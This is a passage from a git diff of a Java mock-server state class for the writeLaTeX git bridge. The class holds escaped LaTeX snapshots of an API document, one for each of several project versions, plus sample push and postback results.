"\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. This endpoint returns the latest version id, when the latest version was created (ISO8601), and the user that last edited the project (if any, otherwise null).\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => {\\n \\\"latestVerId\\\": 39,\\n \\\"latestVerAt\\\": \\\"2014-11-30T18:35:27Z\\\",\\n \\\"latestVerBy\\\": {\\n \\\"email\\\": \\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\": \\\"John Lees-Miller\\\"\\n }}\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: [ {\\n file: the file name from the snapshot,\\n state: \\\"error\\\"|\\\"disallowed\\\"|\\\"unclean_name\\\"\\n }, ... ]\\n}\\nIf the file's error state is unclean_name, the error object will alsocontain a property cleanFile that contains the name of the file after it has been \\\"cleaned\\\" to meet our file naming requirements; for other file error states, this property is not present.\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n message: short string message for debugging\\n errors: [ array of zero or more string messages for the user ]\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 185, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error with the files list (e.g. file extension not allowed):\\n{\\n code: \\\"invalidFiles\\\",\\n errors: TODO\\n}\\nOn error with the project as a whole (e.g. over quota):\\n{\\n code: \\\"invalidProject\\\",\\n errors: TODO\\n}\\nOn unexpected error (bug):\\n{\\n code: \\\"error\\\",\\n message: \\\"Unexpected Error\\\"\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 175, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\nTODO will also include updatedAt time and user (if it was not anonymous)\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\n# NB: JLM originally said PUT, but he now thinks POST is better\\n# NB: you must set a Content-Type: application/json header for this request\\n# in order to specify the data as JSON in the request body\\nPOST https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 202,\\n code: \\\"accepted\\\",\\n message: \\\"Accepted\\\"\\n}\\nResponse on out of date:\\n{\\n status: 409, # Conflict\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 146, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\n\\\\subsection{Push a Project}\\n\\n\\\\begin{lstlisting}\\nPUT https://.../api/v0/docs/1826rqgsdb/snapshots\\nData:\\n{\\n latestVerId: integer,\\n files: [\\n {\\n name: string path (forward slashes, relative to root)\\n url: string (but only if the file is modified; else no url given)\\n }, ...\\n ]\\n postbackUrl: url to post result back to\\n}\\nResponse on success:\\n{\\n status: 20x,\\n}\\nResponse on out of date:\\n{\\n status: 40x,\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\n\\nPostback Data (METHOD POST):\\nOn success:\\n{\\n code: \\\"upToDate\\\",\\n latestVerId: integer\\n}\\nOn out of date:\\n{\\n code: \\\"outOfDate\\\",\\n message: \\\"Out of Date\\\"\\n}\\nOn error:\\n{\\n code: \\\"invalidFile\\\",\\n TODO\\n}\\n\\\\end{lstlisting}\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as one of your servermock projects. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 74, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n# => { latestVerId: 39 }\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. Note that this query is not currently paginated.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n# => [\\n {\\\"versionId\\\":39,\\n \\\"comment\\\":\\\"with more files\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T18:02:19Z\\\"},\\n {\\\"versionId\\\":24,\\n \\\"comment\\\":\\\"first draft\\\",\\n \\\"user\\\":{\\n \\\"email\\\":\\\"jdleesmiller@gmail.com\\\",\\n \\\"name\\\":\\\"John Lees-Miller\\\"},\\n \\\"createdAt\\\":\\\"2014-11-05T17:56:58Z\\\"}]\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\nThe srcs array contains (content, file name) pairs; the atts array contains (URL, file name) pairs.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/39\\n# => {\\n \\\"srcs\\\":[\\n [\\\"This text is from another file.\\\",\\\"foo/bar/servermock.tex\\\"],\\n [\\\"\\\\\\\\documentclass[a4paper]{article}\\\\n...\\\",\\\"main.tex\\\"]],\\n \\\"atts\\\":[\\n [\\\"https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png\\\",\\\"min_mean_wait_evm_7_eps_150dpi.png\\\"]]}\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 39, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server, \\\\url{radiant-wind-3058.herokuapp.com}, but they're not on the production server yet.\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://.../api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. I've added an attachment and a file in a subfolder to make it a bit more interesting.\\n\\n\\\\input{foo/bar/servermock}\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex"), + new SnapshotFile( + "This text is from another file.", + "foo/bar/servermock.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + put( + 24, + new GetForVersionResult( + new SnapshotData( + Arrays.asList( + new SnapshotFile( + "\\\\documentclass[a4paper]{article}\\n\\n\\\\usepackage[english]{babel}\\n\\\\usepackage[utf8]{inputenc}\\n\\\\usepackage{graphicx}\\n\\\\usepackage{fullpage}\\n\\\\usepackage{listings}\\n\\\\usepackage{courier}\\n\\\\usepackage{url}\\n\\n\\\\lstset{basicstyle=\\\\ttfamily,breaklines=true}\\n\\n\\\\begin{document}\\n\\\\title{API for the writeLaTeX-Git Bridge}\\n\\\\author{JLM}\\n\\\\date{\\\\today}\\n\\\\maketitle\\n\\n\\\\section{Fetching a Project from WriteLaTeX}\\n\\nThere are three API calls that will likely be of interest. You can run them against this server (radiant-wind-3058.herokuapp.com).\\n\\n\\\\subsection{Get Doc}\\n\\nA ``doc'' is our internal term for a ``project''. At present, this just returns the latest version number.\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Saved Vers}\\n\\nA ``saved ver'' is a version of a doc, saved by via the versions menu. To list saved versions for a doc:\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/saved_vers\\n\\\\end{lstlisting}\\n\\n\\\\subsection{Get Snapshot for Version}\\n\\nA snapshot contains the content of a project in the given version. You can safely request a snapshot of any version that is, or was at any point in the last 24 hours, (1) a saved version, or (2) the current version. (Older versions may or may not have been moved to cold storage.)\\n\\n\\\\begin{lstlisting}\\nGET https://radiant-wind.....com/api/v0/docs/1826rqgsdb/snapshots/1\\n\\\\end{lstlisting}\\n\\n\\\\section{Pushing a Project to WriteLaTeX}\\n\\nTODO still working on this part\\n\\n\\\\section{Test Data}\\n\\nYou can use this project as a servermock project. Here is an extra file to make it a bit more interesting.\\n\\n\\\\includegraphics[width=\\\\linewidth]{min_mean_wait_evm_7_eps_150dpi}\\n\\n\\\\end{document}", + "main.tex")), + Arrays.asList( + new SnapshotAttachment( + "https://writelatex-staging.s3.amazonaws.com/filepicker/1ENnu6zJSGyslI3DuNZD_min_mean_wait_evm_7.eps.150dpi.png", + "min_mean_wait_evm_7_eps_150dpi.png"))))); + } + }); + } + }; + + push = + new HashMap<String, SnapshotPushResult>() { + { + put("1826rqgsdb", new SnapshotPushResultSuccess()); + } + }; + + postback = + new HashMap<String, SnapshotPostbackRequest>() { + { + // put( + // "1826rqgsdb", + // new SnapshotPostbackRequestInvalidFiles( + // Arrays.<InvalidFileError>asList( + // new InvalidFileErrorDefault( + // "file1.invalid" + // ), + // new InvalidFileErrorDisallowed( + // "file2.exe" + // ), + // new InvalidFileErrorUnclean( + // "hello world.png", + // "hello_world.png" + // ) + // ) + // ) + // ); + // put("1826rqgsdb", new SnapshotPostbackRequestOutOfDate()); + put( + "1826rqgsdb", + new SnapshotPostbackRequestInvalidProject( + Arrays.asList( + "Your project is missing main.tex.", + "Please name your main latex file main.tex."))); + // put("1826rqgsdb", new SnapshotPostbackRequestError()); + } + }; + } + + public GetDocResult getStateForGetDoc(String projectName) { + return getDoc.get(projectName); + } + + public GetSavedVersResult getStateForGetSavedVers(String projectName) { + return getSavedVers.get(projectName); + } + + public GetForVersionResult getStateForGetForVers(String projectName, int versionID) { + return getForVers.get(projectName).get(versionID); + } + + public SnapshotPushResult getStateForPush(String projectName) { + return push.get(projectName); + } + + public SnapshotPostbackRequest getStateForPostback(String projectName) { + return postback.get(projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java new file mode 100644 index 0000000..d5dcd1b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/state/SnapshotAPIStateBuilder.java @@ -0,0 +1,160 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.state; + +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.InputStream; +import java.io.InputStreamReader; +import java.util.*; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import 